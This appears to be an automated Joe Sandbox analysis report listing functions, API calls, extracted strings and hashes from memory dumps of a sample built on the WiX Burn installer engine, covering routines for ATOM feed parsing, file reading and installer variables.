                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                  • Opcode ID: 8e201d13605a692a08f97bba5d018385cb6a3874acfa587ffe4cd71f75c31314
                                                                                                                                                                  • Instruction ID: a015332b2a2d9d453883646a13126c8f2ff040d7dc4d50c567b3db0afe5c8f20
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e201d13605a692a08f97bba5d018385cb6a3874acfa587ffe4cd71f75c31314
                                                                                                                                                                  • Instruction Fuzzy Hash: 01D102B4A0070A8FCB28CF6AC59167AB7B5FF48312F144A1DED56AB391D330AD49CB40
                                                                                                                                                                  Function 00961290 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0d86f53b5f69c5ae22cbc85e39a3727a398c6ca692c5ee72d97d916eeeb26d4f
                                                                                                                                                                  • Instruction ID: 8a08b6ecdda76d3878012931dfdcb0b02ae8128fa69883c0d75ab92551a5c3fc
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d86f53b5f69c5ae22cbc85e39a3727a398c6ca692c5ee72d97d916eeeb26d4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31C476900219AFCB20DFA9CC89EBBB7BDEBC4314F584599F915D7244EA30EE408B54
                                                                                                                                                                  Function 00957142 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00047150,009568C5), ref: 00957147
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: aba7368e5c93ab8adaeeca9c5d33ed70e4d270e1b205e4a6d10e98e765a84b0d
                                                                                                                                                                  • Instruction ID: 59aa89ba771bed748b03a46301ea8cb36736756e3af1cd4498fb805bbe5d1de1
                                                                                                                                                                  • Opcode Fuzzy Hash: aba7368e5c93ab8adaeeca9c5d33ed70e4d270e1b205e4a6d10e98e765a84b0d
                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                  Function 0094DAA4 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 31c81ea08619909c6322d62b5e957f97260132f134e6dfb16b0fb80343a7b8f4
                                                                                                                                                                  • Instruction ID: 991848b3273317ee694ab9555d8affad49ed36827c79d724e0ae4cac446b8c3d
                                                                                                                                                                  • Opcode Fuzzy Hash: 31c81ea08619909c6322d62b5e957f97260132f134e6dfb16b0fb80343a7b8f4
                                                                                                                                                                  • Instruction Fuzzy Hash: D5B12474A01B06ABDB24EF79C885F9AB7E9FF44305F15482EE4AA97641C774F880CB50
                                                                                                                                                                  Function 0094940D Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f45917a54f30991107f6fb82b6191d13c0f43520db1c78e611fe930a6d6763fd
                                                                                                                                                                  • Instruction ID: 0f953996f2580d3900fb96d18e09ba1b5afbfc422d79cb765e4f4f85ba8390df
                                                                                                                                                                  • Opcode Fuzzy Hash: f45917a54f30991107f6fb82b6191d13c0f43520db1c78e611fe930a6d6763fd
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41F332A946218EDF2ECE3DC56AE3737A9F782315F34852DE947826A9D531DD43CA00
                                                                                                                                                                  Function 009797FB Relevance: 79.2, APIs: 11, Strings: 34, Instructions: 471COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,0099EC58,000000FF,?,?,?), ref: 00979914
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 00979956
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 0097999B
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 009799E0
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 00979A25
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00979A6A
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 00979AA7
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 00979AE4
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,link,000000FF), ref: 00979B3E
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00979B88
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00979D3A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                                                  • String ID: Cannot have two content elements in ATOM entry.$Failed to allocate ATOM entry authors.$Failed to allocate ATOM entry categories.$Failed to allocate ATOM entry content.$Failed to allocate ATOM entry id.$Failed to allocate ATOM entry links.$Failed to allocate ATOM entry published.$Failed to allocate ATOM entry summary.$Failed to allocate ATOM entry title.$Failed to allocate ATOM entry updated.$Failed to find required feed/entry/id element.$Failed to find required feed/entry/title element.$Failed to find required feed/entry/updated element.$Failed to get child nodes of ATOM entry element.$Failed to parse ATOM entry author.$Failed to parse ATOM entry category.$Failed to parse ATOM entry content.$Failed to parse ATOM entry link.$Failed to parse unknown ATOM entry element: %ls$Failed to process all ATOM entry elements.$author$cabinet.dll$category$clbcatq.dll$content$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                  • API String ID: 318886736-3340435141
                                                                                                                                                                  • Opcode ID: 376cfcca0c678d68f580bba21d127182e227ee328fdde7a77ba40e71fc3a608b
                                                                                                                                                                  • Instruction ID: cf4c6bd8e96f57d3491ccfcdc334ea3db02267a2493901b088367a9b5bed2a79
                                                                                                                                                                  • Opcode Fuzzy Hash: 376cfcca0c678d68f580bba21d127182e227ee328fdde7a77ba40e71fc3a608b
                                                                                                                                                                  • Instruction Fuzzy Hash: D0E11732B88315FBDF218A94CC4BFAF7679DB86B24F218255F619BB1D0DAB09900D750
                                                                                                                                                                  Function 00943672 Relevance: 75.7, APIs: 6, Strings: 37, Instructions: 484COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009701DE: VariantInit.OLEAUT32(?), ref: 009701F5
                                                                                                                                                                    • Part of subcall function 009701DE: VariantClear.OLEAUT32(?), ref: 00970340
                                                                                                                                                                    • Part of subcall function 009701DE: SysFreeString.OLEAUT32(00000000), ref: 0097034B
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,condition,00000000,?,DetectionType,?,00000000,?,00000000,00000002,?,00926624,00000000), ref: 009436DB
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,arp,00000000,?,00926624,00000000,?), ref: 009437DB
                                                                                                                                                                    • Part of subcall function 009701DE: SysAllocString.OLEAUT32(?), ref: 0097022F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: ArpDisplayVersion$ArpId$ArpWin64$Bundle$DetectCondition$DetectionType$Failed to build full key path.$Failed to get @ArpDisplayVersion.$Failed to get @ArpId.$Failed to get @ArpWin64.$Failed to get @Bundle.$Failed to get @DetectCondition.$Failed to get @DetectionType.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to get @Uninstallable.$Failed to parse @ArpDisplayVersion: %ls$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid detection type: %ls$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallArguments$Uninstallable$arp$burn$condition$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp$netfx4$none
                                                                                                                                                                  • API String ID: 702752599-1746888974
                                                                                                                                                                  • Opcode ID: cce705d579af86a022079d689c2fc22530eac813ca8c03868679089537ffba83
                                                                                                                                                                  • Instruction ID: 0286a378e9399535622a38e44171b9c0fb32c3fff103d2891a4c01b8156636b9
                                                                                                                                                                  • Opcode Fuzzy Hash: cce705d579af86a022079d689c2fc22530eac813ca8c03868679089537ffba83
                                                                                                                                                                  • Instruction Fuzzy Hash: B1E10432B84735B6EA3169744C4BFFBA91C9B85F65F11C610FA58BB2C1D2A49F4086E0
                                                                                                                                                                  Function 0097B193 Relevance: 66.9, APIs: 9, Strings: 29, Instructions: 385COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,00000000,00000000), ref: 0097B1BE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0097B1DD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to allocate application identity.$Failed to allocate application summary.$Failed to allocate application title.$Failed to allocate application type.$Failed to allocate content type.$Failed to allocate content.$Failed to allocate enclosures for application update entry.$Failed to allocate upgrade id.$Failed to compare version to upgrade version.$Failed to parse enclosure.$Failed to parse upgrade version string '%ls' from ATOM entry.$Failed to parse version string '%ls' from ATOM entry.$Upgrade version is greater than or equal to application version.$application$clbcatq.dll$comres.dll$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$msasn1.dll$msi.dll$true$type$upgrade$version$version.dll$wininet.dll
                                                                                                                                                                  • API String ID: 1825529933-1736944660
                                                                                                                                                                  • Opcode ID: 2f2b0182ec879f10667ed5cf25ecf02413837701cc1cd7ecbe2aa160450fc103
                                                                                                                                                                  • Instruction ID: ed5a12deb6ccb1124d59b5f3cd5cb3bf6ddcddfad3ec77abdf9078016ef8fa71
                                                                                                                                                                  • Opcode Fuzzy Hash: 2f2b0182ec879f10667ed5cf25ecf02413837701cc1cd7ecbe2aa160450fc103
                                                                                                                                                                  • Instruction Fuzzy Hash: 5ED10332684305FBDB219F54CC46F5B76A9AB81B24F208615F629BF2D2DBB0E940DB40
                                                                                                                                                                  Function 0091BA68 Relevance: 65.2, APIs: 6, Strings: 31, Instructions: 490COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00917D9B,00917DDB,?,009340B9,?,?,00917D5B,?,?,?,?,?,00917D9B), ref: 0091BA98
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,009340B9,?,?,00917D5B,?,?,?,?,?,00917D9B), ref: 0091C00D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Attempt to add built-in variable: %ls$Attempt to add variable again: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing formatted variable '%ls' to value '%ls'$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$d:\a\wix4\wix4\src\burn\engine\variable.cpp$formatted$numeric$string$version
                                                                                                                                                                  • API String ID: 3168844106-1770900757
                                                                                                                                                                  • Opcode ID: 0b53e94a50546d34895528fad26b439ed4f969a6317ad2e411500f24148099e9
                                                                                                                                                                  • Instruction ID: 462ac316a253d44b61e0b178101172103d8a940dbb2423a43ec6d0ba890bee82
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b53e94a50546d34895528fad26b439ed4f969a6317ad2e411500f24148099e9
                                                                                                                                                                  • Instruction Fuzzy Hash: C9F1F836B8421CFBDB11AA54CC06FEF767AAFC8B14F210054F6147B2D1D7B59A819B90
                                                                                                                                                                  Function 0097A38B Relevance: 54.6, APIs: 8, Strings: 23, Instructions: 334COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,rel,00000000,?,?,?,00000000), ref: 0097A40F
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097A6E8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate ATOM link href., xrefs: 0097A46F
                                                                                                                                                                  • Failed to get child nodes of ATOM link element., xrefs: 0097A5F7
                                                                                                                                                                  • msasn1.dll, xrefs: 0097A6B6
                                                                                                                                                                  • version.dll, xrefs: 0097A552
                                                                                                                                                                  • Failed to process all ATOM link elements., xrefs: 0097A67E
                                                                                                                                                                  • Failed to parse ATOM link length., xrefs: 0097A4BF
                                                                                                                                                                  • Failed to allocate ATOM link rel., xrefs: 0097A42D
                                                                                                                                                                  • Failed to process all ATOM link attributes., xrefs: 0097A5C6
                                                                                                                                                                  • length, xrefs: 0097A484
                                                                                                                                                                  • title, xrefs: 0097A4D4
                                                                                                                                                                  • Failed to allocate ATOM link value., xrefs: 0097A6C2
                                                                                                                                                                  • crypt32.dll, xrefs: 0097A45F
                                                                                                                                                                  • href, xrefs: 0097A442
                                                                                                                                                                  • Failed to parse unknown ATOM link element: %ls, xrefs: 0097A692
                                                                                                                                                                  • comres.dll, xrefs: 0097A49E
                                                                                                                                                                  • type, xrefs: 0097A512
                                                                                                                                                                  • Failed to allocate ATOM link title., xrefs: 0097A4FD
                                                                                                                                                                  • Failed to parse unknown ATOM link attribute: %ls, xrefs: 0097A5B0
                                                                                                                                                                  • rel, xrefs: 0097A403
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0097A3CD, 0097A6A1, 0097A6D1
                                                                                                                                                                  • msi.dll, xrefs: 0097A624
                                                                                                                                                                  • Failed to allocate ATOM link type., xrefs: 0097A53B
                                                                                                                                                                  • Failed get attributes for ATOM link., xrefs: 0097A3BE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$CompareFree
                                                                                                                                                                  • String ID: Failed get attributes for ATOM link.$Failed to allocate ATOM link href.$Failed to allocate ATOM link rel.$Failed to allocate ATOM link title.$Failed to allocate ATOM link type.$Failed to allocate ATOM link value.$Failed to get child nodes of ATOM link element.$Failed to parse ATOM link length.$Failed to parse unknown ATOM link attribute: %ls$Failed to parse unknown ATOM link element: %ls$Failed to process all ATOM link attributes.$Failed to process all ATOM link elements.$comres.dll$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                                  • API String ID: 3589242889-4187876800
                                                                                                                                                                  • Opcode ID: 75dc89715144cffb9e1d223083684951c5a08b63b91dc4c31c233ad9f25a1532
                                                                                                                                                                  • Instruction ID: f4ed9fc9232343705e1e1f8aa3a9bcd41910812531e9ca555109ac54f95b755f
                                                                                                                                                                  • Opcode Fuzzy Hash: 75dc89715144cffb9e1d223083684951c5a08b63b91dc4c31c233ad9f25a1532
                                                                                                                                                                  • Instruction Fuzzy Hash: 7BB1E473A40208FBDF119B90CC4AFAF7B79EBC5B14F158055F608AB190EBB09A41EB55
                                                                                                                                                                  Function 00973559 Relevance: 44.1, APIs: 10, Strings: 15, Instructions: 391fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000024,80000000,00000024,00000000,00000003,08000080,00000000,00000000,00000000,00000024,000000F8,00000001,00000000,000000F8,00000024,?), ref: 0097364E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0097365C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0097366E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CreateFile
                                                                                                                                                                  • String ID: *wzSrcPath is null$Failed to allocate memory to read in file: %ls$Failed to completely read file: %ls$Failed to get size of file: %ls$Failed to load file: %ls, too large.$Failed to open file: %ls$Failed to re-allocate memory to read in file: %ls$Failed to read from file: %ls$Failed to seek position %d$Invalid argument pcbDest$Invalid argument ppbDest$Invalid argument wzSrcPath$Start position %d bigger than file '%ls' size %llu$Underflow calculating remaining buffer size.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 1722934493-3998981784
                                                                                                                                                                  • Opcode ID: 10738f63e49e004ba61fadf6ca7fcded37a1be803d9b478573973c11c6a99184
                                                                                                                                                                  • Instruction ID: 7b6d0e2ab2eaa67a5c51922b21c086b73dfc546e393d02350fab2758a947d0b4
                                                                                                                                                                  • Opcode Fuzzy Hash: 10738f63e49e004ba61fadf6ca7fcded37a1be803d9b478573973c11c6a99184
                                                                                                                                                                  • Instruction Fuzzy Hash: 2DC10073B40319BBEB205A548C4BFFF7568AF84B54F11C518BA09BB2C1E6F48E4066E0
                                                                                                                                                                  Function 0092B6BD Relevance: 40.5, APIs: 9, Strings: 14, Instructions: 250sleepfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,?), ref: 0092B729
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092B737
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0092B75B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
